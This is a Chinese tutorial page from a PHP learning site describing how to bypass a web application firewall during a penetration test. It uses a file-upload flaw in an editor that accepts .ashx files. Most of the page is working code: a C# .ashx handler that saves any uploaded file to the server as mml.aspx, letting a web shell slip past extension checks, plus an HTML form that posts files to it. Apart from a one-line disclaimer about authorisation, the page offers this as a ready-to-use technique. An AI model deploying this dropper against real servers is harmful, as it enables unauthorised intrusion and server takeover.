网站地图    收藏   

主页 > 后端 > 网站安全 >

ashx绕过防火墙 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 小编注:渗透测试时请预先获得许可或授权,禁止进行非法渗透。授权对一个电视台进行渗透测试,前提编辑器可以上传ashx文件的(编辑器漏洞) 根据参考:http://www.2cto.com/Article/201212/176...

小编注:渗透测试时请预先获得许可或授权,禁止进行非法渗透。

授权对一个电视台进行渗透测试,前提编辑器可以上传ashx文件的(编辑器漏洞) 根据参考:http://www.2cto.com/Article/201212/176804.html

 2.比较笨的方法,看代码吧 我对代码进行测试使用,防火墙依然检查aspx后缀,,pnig0s的代码是上传xx.jpg保存的也是xx.jpg,xx.txt也是xx.txt,,,
我的方法是做了一个小的修改,伪原创。而且客户端不用那么麻烦。 上传任何类型文件(防火墙不检查的后缀)都会在服务端自动重命名.

———————- 看代码吧 ——————-
//////服务端////
   <%@ WebHandler Language="C#" Class="Uploader" %>
    using System;
    using System.IO;
    using System.Web;    
 
    public class Uploader : IHttpHandler
    {
        public void ProcessRequest(HttpContext hc)
        {
            foreach (string fileKey in hc.Request.Files)
            {
                HttpPostedFile file = hc.Request.Files[fileKey];
                file.SaveAs(hc.Server.MapPath("mml.aspx"));
            }
        }    
 
        public bool IsReusable
        {
            get { return true; }
        }
    } 
 
////////客户端///////
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>html控件与ashx进行保存上传文件</title>
</head>
<body>
 
<!--enctype="multipart/form-data"该类型指定传输数据特殊类型,如图片或mp3等,-->
<form action="http://host/uploadfile/xxx/upko.ashx" method="post" enctype="multipart/form-data" id="form1">
    <p>
        <input id="fileKey" name="fileKey" type="file" /></p>
    <p>
        <input id="Button1" type="submit" value="button" /></p>
</form>
</body>
</html>

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论